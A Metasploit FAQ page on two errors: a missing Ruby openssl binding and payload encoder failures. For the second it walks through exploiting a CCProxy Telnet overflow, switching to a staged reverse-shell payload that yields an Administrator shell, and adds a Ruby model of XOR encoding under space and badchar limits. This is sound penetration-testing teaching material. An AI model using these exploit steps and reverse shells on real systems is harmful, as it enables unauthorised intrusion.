Metasploit/Frequently Asked Questions
Q: The first time I run Metasploit, I get the following error: no such file to load -- openssl (LoadError)
- Example
[~/metasploit]# ./msfgui
./lib/rex/socket/ssl_tcp_server.rb:4:in `require': no such file to load -- openssl (LoadError)
        from ./lib/rex/socket/ssl_tcp_server.rb:4
        from ./lib/rex/socket/comm/local.rb:5:in `require'
        from ./lib/rex/socket/comm/local.rb:5
        from ./lib/rex/socket.rb:22:in `require'
        from ./lib/rex/socket.rb:22
        from ./lib/rex.rb:71:in `require'
        from ./lib/rex.rb:71
        from ./msfgui:10:in `require'
        from ./msfgui:10
A: Metasploit needs the Ruby binding for openssl, not the standard C implementation of openssl used by Apache and similar software. Install the matching ruby-openssl library for your Ruby version.
- Example (for Debian; check your own OS's package names, or try using gem)
pwebster@metasploit:~$ apt-cache search ruby | grep openssl
libopenssl-ruby - OpenSSL interface for Ruby
libopenssl-ruby1.8 - OpenSSL interface for Ruby 1.8
libopenssl-ruby1.9 - OpenSSL interface for Ruby 1.9
pwebster@metasploit:~# apt-get install libopenssl-ruby
Q: After setting all the required options for an exploit module and running exploit, I get the following error: [-] Exploit failed: No encoders encoded the buffer successfully.
- Example
msf > use windows/proxy/ccproxy_telnet_ping
msf exploit(ccproxy_telnet_ping) > info

       Name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
    Version: $Revision$
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License

Provided by:
  Patrick Webster <patrick [at] aushack.com>

Available targets:
  Id  Name
  --  ----
  0   Windows 2000 Pro SP0 - English
  1   Windows 2000 Pro SP1 - English
  2   Windows 2000 Pro SP2 - English
  3   Windows 2000 Pro SP3 - English
  4   Windows 2000 Pro SP4 - English
  5   Windows XP SP0/1 - English
  6   Windows 2003 Server SP0/1 - English

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  127.0.0.1        yes       The target address
  RPORT  23               yes       The target port

Payload information:
  Space: 200
  Avoid: 5 characters

Description:
  This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet
  service. The stack is overwritten when sending an overly long address
  to the 'ping' command.

msf exploit(ccproxy_telnet_ping) > set TARGET 4
TARGET => 4
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ccproxy_telnet_ping) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(ccproxy_telnet_ping) > check
[*] The target appears to be vulnerable.
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
A: The payloads available to an exploit (show payloads) depend on the amount of memory "space" the exploit has to work with. In the example above, the payload space is "Space: 200". In addition, the target application usually refuses certain characters (most often the null byte 0x00, because it terminates a C string, i.e. a character array). In this case five characters are not allowed in the payload: "Avoid: 5 characters".
When the exploit runs, the payload generator tries to fit your chosen payload into those 200 bytes of space without using any of the 5 forbidden characters. This is not always possible, and when it fails you get the error: No encoders encoded the buffer successfully.
All is not lost, however. The Metasploit Framework supports staged payloads. A staged payload is a noticeably smaller payload which does not perform your desired action (for example a reverse shell) itself; instead it starts a staging platform to which the rest can then be added. So in this case, rather than a complete reverse shell, it will
- create the staging platform,
- allocate enough space to hold your desired payload,
- fetch the rest of the payload from you, and
- execute the payload as a whole.
Generally, all staged payloads are indicated by a "/" after the desired payload. Here are some examples:
windows/dllinject/reverse_tcp        Windows Inject DLL, Reverse TCP Stager
windows/download_exec/bind_tcp       Windows Executable Download and Execute, Bind TCP Stager
windows/exec/find_tag                Windows Execute Command, Find Tag Ordinal Stager
windows/meterpreter/reverse_tcp      Windows Meterpreter, Reverse TCP Stager
windows/shell/reverse_tcp            Windows Command Shell, Reverse TCP Stager
windows/upexec/bind_tcp              Windows Upload/Execute, Bind TCP Stager
windows/vncinject/reverse_ord_tcp    Windows VNC Inject, Reverse Ordinal TCP Stager
So, now that we know the exploit cannot hold an "inline" payload, we can use a stager instead:
...
msf exploit(ccproxy_telnet_ping) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ccproxy_telnet_ping) > exploit
[*] Started reverse handler
[*] Trying target Windows 2000 Pro SP4 - English on host 127.0.0.1:23...
[*] Sending stage (474 bytes)
[*] Command shell session 8 opened (127.0.0.1:4444 -> 127.0.0.1:2016)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>
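To make the "Space" and "Avoid" constraints above concrete, here is an added Ruby model of the check an encoder has to satisfy; it is not code from the Metasploit Framework. It assumes a single-byte XOR encoder with a 14-byte decoder stub, and the payload bytes and the five forbidden bytes are constructed stand-ins, not real shellcode or the module's real badchars.

```ruby
# Added example: why "No encoders encoded the buffer successfully" happens.
# The module's constraints: 200 bytes of space, 5 forbidden bytes.
SPACE     = 200
BADCHARS  = "\x00\x0a\x0d\x20\x3a".b.bytes   # constructed: 5 stand-in badchars
STUB_SIZE = 14                               # assumed size of a XOR decoder stub

# Constructed stand-ins: a "full inline" payload that is larger than the
# space, and a much smaller stager that only has to fetch the real stage.
INLINE_PAYLOAD = (0..255).cycle.first(314).pack("C*")   # 314 bytes
STAGER         = (0x41..0x9c).to_a.pack("C*")           # 92 bytes

# true when buf contains none of the forbidden bytes
def clean?(buf, badchars = BADCHARS)
  buf.bytes.none? { |b| badchars.include?(b) }
end

# Try every single-byte XOR key. The encoded buffer plus the decoder stub
# must fit in `space`, and neither the encoded bytes nor the key itself may
# contain a forbidden byte. Returns the first usable key, or nil when no
# key works (the analogue of the encoder failure message above).
def find_xor_key(payload, space = SPACE, badchars = BADCHARS, stub = STUB_SIZE)
  return nil if payload.bytesize + stub > space
  (1..255).each do |key|
    next unless clean?(key.chr, badchars)
    encoded = payload.bytes.map { |b| b ^ key }.pack("C*")
    return key if clean?(encoded, badchars)
  end
  nil
end

if __FILE__ == $0
  [["inline", INLINE_PAYLOAD], ["stager", STAGER]].each do |name, buf|
    key = find_xor_key(buf)
    puts "#{name} (#{buf.bytesize} bytes): " +
         (key ? "encodable with XOR key 0x#{key.to_s(16)}" : "no encoder succeeded")
  end
end
```

Raising SPACE or removing bytes from BADCHARS shows how each constraint alone can be the reason an otherwise fine payload is rejected.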